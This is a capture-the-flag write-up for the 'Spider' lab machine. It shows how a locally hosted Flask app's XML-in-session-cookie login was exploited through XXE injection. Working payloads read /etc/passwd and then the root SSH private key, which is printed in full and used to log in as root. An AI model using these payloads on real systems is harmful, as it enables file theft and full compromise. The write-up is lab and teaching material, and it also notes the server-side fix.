7 localhost:8080 XXE

# something is running locally; it's a website of some sort (confirmed with curl against localhost:8080 from the box)
# port-forward it over SSH so it can be explored from the attacking host

$ ssh -i chiv_id_rsa -L 8081:localhost:8080 chiv@spider.htb
Last login: Thu Oct  7 03:35:05 2021 from 10.10.16.7

http://localhost:8081 > http://localhost:8081/login
Beta Login
| asking only username

# admin works (any username is accepted — there is no password and the name is not validated)
> http://localhost:8081/site
Checkout cart (with items)

GET /site HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/login
DNT: 1
Connection: close
Cookie: session=.eJxNjEFvgyAARv_KwnkH7WqTmexiAG03cKCActPRBC1as5HU2fS_z16aHb-8770rcPPgQHwFTy2IgUAUGzSX7HSQXPlRDqE6KvLbZrprBN6W6ZQYEUJWcSIh_xDIvpthv4jCw5WPhaBJjqeM94m-8_vWgYNMmQML0FZjm7cp9VTZTobiW0lTmBRXFFpCQr1Tbu1JVxE1M715Hf_7PLOXekFRs_ZJlXRNz18EItFXSuZc2YYv-FIP56B4_M1GnUxKsBMUecYWF9X9PiI4GT_L4A3cnsF07kb_A-Lg9gfxF1a8.YV5wDA.SAZyqkHxs51fGOUlS8eloTqmq4g
Upgrade-Insecure-Requests: 1

# analyzing the session cookie — a Flask session is signed, not encrypted, so flask-unsign can decode the payload without the server's secret key (the secret is only needed to forge one)

$ flask-unsign --decode --cookie '.eJxNjEFvgyAARv_KwnkH7WqTmexiAG03cKCActPRBC1as5HU2fS_z16aHb-8770rcPPgQHwFTy2IgUAUGzSX7HSQXPlRDqE6KvLbZrprBN6W6ZQYEUJWcSIh_xDIvpthv4jCw5WPhaBJjqeM94m-8_vWgYNMmQML0FZjm7cp9VTZTobiW0lTmBRXFFpCQr1Tbu1JVxE1M715Hf_7PLOXekFRs_ZJlXRNz18EItFXSuZc2YYv-FIP56B4_M1GnUxKsBMUecYWF9X9PiI4GT_L4A3cnsF07kb_A-Lg9gfxF1a8.YV5wDA.SAZyqkHxs51fGOUlS8eloTqmq4g'
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+YWRtaW48L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==', 'points': 0}

$ echo "PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+YWRtaW48L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==" |base64 -d
<!-- API Version 1.0.0 -->
<root>
    <data>
        <username>admin</username>
        <is_admin>0</is_admin>
    </data>
</root>

# none of the links on /site do anything; only /logout works and returns us to /login
# time to inspect the requests in Burp

http://localhost:8081/login
# page source shows a hidden form field (version=1.0.0, see the POST body below)

# submitting login page
POST /login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://localhost:8081
DNT: 1
Connection: close
Referer: http://localhost:8081/login
Cookie: session=eyJwb2ludHMiOjB9.YV5xxQ.BR65NPl5rutXr6vagiIiKWE5rWU
Upgrade-Insecure-Requests: 1

username=kashz&version=1.0.0

XXE Attack

# both POST parameters end up inside the XML document stored in the session cookie: version lands in the
# <!-- API Version ... --> comment and username in <username>. The server is evidently building the XML by
# string concatenation and then parsing it with entity resolution enabled, so this is XML injection / XXE.
# (Server-side fix would be to build the document with an XML API instead of string formatting and to parse
# with external entity resolution disabled — lxml's resolve_entities=False.)
# username is under our control, so inject an external entity and reference it to read /etc/passwd:
| <!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
| usage &xxe;

# sending the entity reference &kashz; in username and the DOCTYPE (entity declaration) in version — a DOCTYPE must
# precede the root element, and version is the parameter that lands at the top of the document. Note `&` is URL-encoded
# as %26 in the body so the form parser does not treat it as a parameter separator
POST /login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://localhost:8081
DNT: 1
Connection: close
Referer: http://localhost:8081/login
Cookie: session=eyJwb2ludHMiOjB9.YV51PA.nd1aJvshr7Sd43IsBhLqj_xczsM
Upgrade-Insecure-Requests: 1

username=%26kashz;&version=1.0.0<!DOCTYPE+foo+[<!ENTITY+kashz+SYSTEM+"/etc/passwd">+]>

# we get response
HTTP/1.1 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://localhost:8081/site
Vary: Cookie
Set-Cookie: session=.eJxdj19rgzAAxL_KyPMejLUwCntxJnZusUvMn5q3SMq0xixUoe1Kv_ssrDD2ePzuuLsLcKfBgdUFPDRgBQQqsUUnTvtCMjV5OUC1U-TcrHVnBE54HlIrILJxWzHukOz1KGTB6QA7sm-9XISFwYUspeTSFaYSNjI5OZtMF6xfGslxxRzjVDlCXH1U235poau5Dz1xOIjcvWicBrplRGbsXaD2zQ6v36KasrnfV6JMNzis2T7VN37TOnIZVbagEUo0bjdNXk6lajsJxaEa4L3_Y-dt_J_T2P3JYy-QHXfu88yGqZPxCYr57wYd5_-hJr0-1M6OVqa-ie9-sjTzfjG0VMdPCc_K373jM7g-gvDV-WkEq-j6A-86eJU.YV53tg.es7M96TK3BHDMfS17mAAVESMtac; HttpOnly; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/site">/site</a>.  If not click the link.

$ flask-unsign --decode --cookie '.eJxdj19rgzAAxL_KyPMejLUwCntxJnZusUvMn5q3SMq0xixUoe1Kv_ssrDD2ePzuuLsLcKfBgdUFPDRgBQQqsUUnTvtCMjV5OUC1U-TcrHVnBE54HlIrILJxWzHukOz1KGTB6QA7sm-9XISFwYUspeTSFaYSNjI5OZtMF6xfGslxxRzjVDlCXH1U235poau5Dz1xOIjcvWicBrplRGbsXaD2zQ6v36KasrnfV6JMNzis2T7VN37TOnIZVbagEUo0bjdNXk6lajsJxaEa4L3_Y-dt_J_T2P3JYy-QHXfu88yGqZPxCYr57wYd5_-hJr0-1M6OVqa-ie9-sjTzfjG0VMdPCc_K373jM7g-gvDV-WkEq-j6A-86eJU.YV53tg.es7M96TK3BHDMfS17mAAVESMtac'
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMDwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPiAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Jmthc2h6OzwvdXNlcm5hbWU+CiAgICAgICAgPGlzX2FkbWluPjA8L2lzX2FkbWluPgogICAgPC9kYXRhPgo8L3Jvb3Q+', 'points': 0}

$ echo 'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMDwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPiAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Jmthc2h6OzwvdXNlcm5hbWU+CiAgICAgICAgPGlzX2FkbWluPjA8L2lzX2FkbWluPgogICAgPC9kYXRhPgo8L3Jvb3Q+' | base64 -d
<!-- API Version 1.0.0<!DOCTYPE foo [<!ENTITY kashz SYSTEM "/etc/passwd"> ]> -->
<root>
    <data>
        <username>&kashz;</username>
        <is_admin>0</is_admin>
    </data>
</root>
# the DOCTYPE was swallowed by the <!-- API Version ... --> comment, so it was never parsed. Close the comment with -->
# before the DOCTYPE and open a new <!-- after it so the template's trailing --> still has a matching opener
# resending payload
| username=%26kashz;&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+kashz+SYSTEM+"/etc/passwd">+]><!--

# response
HTTP/1.1 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://localhost:8081/site
Vary: Cookie
Set-Cookie: session=.eJxVj1FPgzAYRf-K6bMPBccSl_iCtCCmw7Z87da3shq7URhGkjEW_7tLTBZ9Pvee3HtBYeoCWl3QXYNWCMiaOjLVvC2V0GOvuki_a3ZuCrO3QBd1PqQOoowVgtveHaGFRFCTN5RKwOW4PbwsTOSWLvZS1UpBZKRuQ-Fyf2DdRyzBVDrABK0BwHSos1IzGpJq44wmydJkpbAqHXj3668pOxk81ex5zGzvk6s_YTTtm9iVHNMeiJM2F4WQVw60l7BODQ4Z145LapY6-FenwobpiVs1nLXyVROrz93sGYv-cxM__u2XovCn7UwSS4eCbdK9PYgHICzZ5WyqtLdipqdtd8Tylnexbl1-_QNrMnI-h9vetxo_oe97NBz3_fiFVvj7B7zJfLc.YV556A.3VZp3pZWZYgBJjdzx6uynwuUuao; HttpOnly; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/site">/site</a>.  If not click the link.

# analysis
$ flask-unsign --decode --cookie '.eJxVj1FPgzAYRf-K6bMPBccSl_iCtCCmw7Z87da3shq7URhGkjEW_7tLTBZ9Pvee3HtBYeoCWl3QXYNWCMiaOjLVvC2V0GOvuki_a3ZuCrO3QBd1PqQOoowVgtveHaGFRFCTN5RKwOW4PbwsTOSWLvZS1UpBZKRuQ-Fyf2DdRyzBVDrABK0BwHSos1IzGpJq44wmydJkpbAqHXj3668pOxk81ex5zGzvk6s_YTTtm9iVHNMeiJM2F4WQVw60l7BODQ4Z145LapY6-FenwobpiVs1nLXyVROrz93sGYv-cxM__u2XovCn7UwSS4eCbdK9PYgHICzZ5WyqtLdipqdtd8Tylnexbl1-_QNrMnI-h9vetxo_oe97NBz3_fiFVvj7B7zJfLc.YV556A.3VZp3pZWZYgBJjdzx6uynwuUuao'
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMC0tPjwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPjwhLS0gLS0+Cjxyb290PgogICAgPGRhdGE+CiAgICAgICAgPHVzZXJuYW1lPiZrYXNoejs8L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==', 'points': 0}

$ echo 'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMC0tPjwhRE9DVFlQRSBmb28gWzwhRU5USVRZIGthc2h6IFNZU1RFTSAiL2V0Yy9wYXNzd2QiPiBdPjwhLS0gLS0+Cjxyb290PgogICAgPGRhdGE+CiAgICAgICAgPHVzZXJuYW1lPiZrYXNoejs8L3VzZXJuYW1lPgogICAgICAgIDxpc19hZG1pbj4wPC9pc19hZG1pbj4KICAgIDwvZGF0YT4KPC9yb290Pg==' | base64 -d
<!-- API Version 1.0.0--><!DOCTYPE foo [<!ENTITY kashz SYSTEM "/etc/passwd"> ]><!-- -->
<root>
    <data>
        <username>&kashz;</username>
        <is_admin>0</is_admin>
    </data>
</root>

# the entity is expanded when the server parses the stored document; /site renders the username, so Burp shows the file contents in the welcome line
Welcome, root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chiv:x:1000:1000:chiv:/home/chiv:/bin/bash

# trying to read /root/.ssh/id_rsa with the same entity, only the SYSTEM path changed
| username=%26kashz;&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+kashz+SYSTEM+"/root/.ssh/id_rsa">+]><!--
# works — the process parsing the XML can evidently read files under /root, and the multi-line PEM is returned intact
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAl/dn2XpJQuIw49CVNdAgdeO5WZ47tZDYZ+7tXD8Q5tfqmyxq
gsgQskHffuzjq8v/q4aBfm6lQSn47G8foq0gQ1DvuZkWFAATvTjliXuE7gLcItPt
iFtbg7RQV/xaTwAmdRfRLb7x63TG6mZDRkvFvGfihWqAnkuJNqoVJclgIXLuwUvk
4d3/Vo/MdEUb02ha7Rw9oHSYKR4pIgv4mDwxGGL+fwo6hFNCZ+YK96wMlJc3vo5Z
EgkdKXy3RnLKvtxjpIlfmAZGu0T+RX1GlmoPDqoDWRbWU+wdbES35vqxH0uM5WUh
vPt5ZDGiKID4Tft57udHxPiSD6YBhLT5ooHfFQIDAQABAoIBAFxB9Acg6Vc0kO/N
krhfyUUo4j7ZBHDfJbI7aFinZPBwRtq75VHOeexud2vMDxAeQfJ1Lyp9q8/a1mdb
sz4EkuCrQ05O9QthXJp0700+8t24WMLAHKW6qN1VW61+46iwc6iEtBZspNwIQjbN
rKwBlmMiQnAyzzDKtNu9+Ca/kZ/cAjLpz3m1NW7X//rcDL8kBGs8RfuHqz/R4R7e
HtCvxuXOFnyo/I+A3j1dPHoc5UH56g1W82NwTCbtCfMfeUsUOByLcg3yEypClO/M
s7pWQ1e4m27/NmU7R/cslc03YFQxow+CIbdd59dBKTZKErdiMd49WiZSxizL7Rdt
WBTACsUCgYEAyU9azupb71YnGQVLpdTOzoTD6ReZlbDGeqz4BD5xzbkDj7MOT5Dy
R335NRBf7EJC0ODXNVSY+4vEXqMTx9eTxpMtsP6u0WvIYwy9C7K/wCz+WXNV0zc0
kcSQH/Yfkd2jADkMxHXkz9THXCChOfEt7IUmNSM2VBKb1xBMkuLXQbMCgYEAwUBS
FhRNrIB3os7qYayE+XrGVdx/KXcKva6zn20YktWYlH2HLfXcFQQdr30cPxxBSriS
BAKYcdFXSUQDPJ1/qE21OvDLmJFu4Xs7ZdGG8o5v8JmF6TLTwi0Vi45g38DJagEl
w42zV3vV7bsAhQsMvd3igLEoDFt34jO9nQv9KBcCgYEAk8eLVAY7AxFtljKK++ui
/Xv9DWnjtz2UFo5Pa14j0O+Wq7C4OrSfBth1Tvz8TcW+ovPLSD0YKODLgOWaKcQZ
mVaF3j64OsgyzHOXe7T2iq788NF4GZuXHcL8Qlo9hqj7dbhrpPUeyWrcBsd1U8G3
AsAj8jItOb6HZHN0owefGX0CgYAICQmgu2VjZ9ARp/Lc7tR0nyNCDLII4ldC/dGg
LmQYLuNyQSnuwktNYGdvlY8oHJ+mYLhJjGYUTXUIqdhMm+vj7p87fSmqBVoL7BjT
Kfwnd761zVxhDuj5KPC9ZcUnaJe3XabZU7oCSDbj9KOX5Ja6ClDRswwMP31jnW0j
64yyLwKBgBkRFxxuGkB9IMmcN19zMWA6akE0/jD6c/51IRx9lyeOmWFPqitNenWK
teYjUjFTLgoi8MSTPAVufpdQV4128HuMbMLVpHYOVWKH/noFetpTE2uFStsNrMD8
vEgG/fMJ9XmHVsPePviZBfrnszhP77sgCXX8Grhx9GlVMUdxeo+j
-----END RSA PRIVATE KEY-----
# save the key above as root_id_rsa; ssh refuses a private key that is readable by others, hence chmod 600
$ chmod 600 root_id_rsa
$ ssh -i root_id_rsa root@spider.htb
Last login: Fri Jul 23 14:11:40 2021
root@spider:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
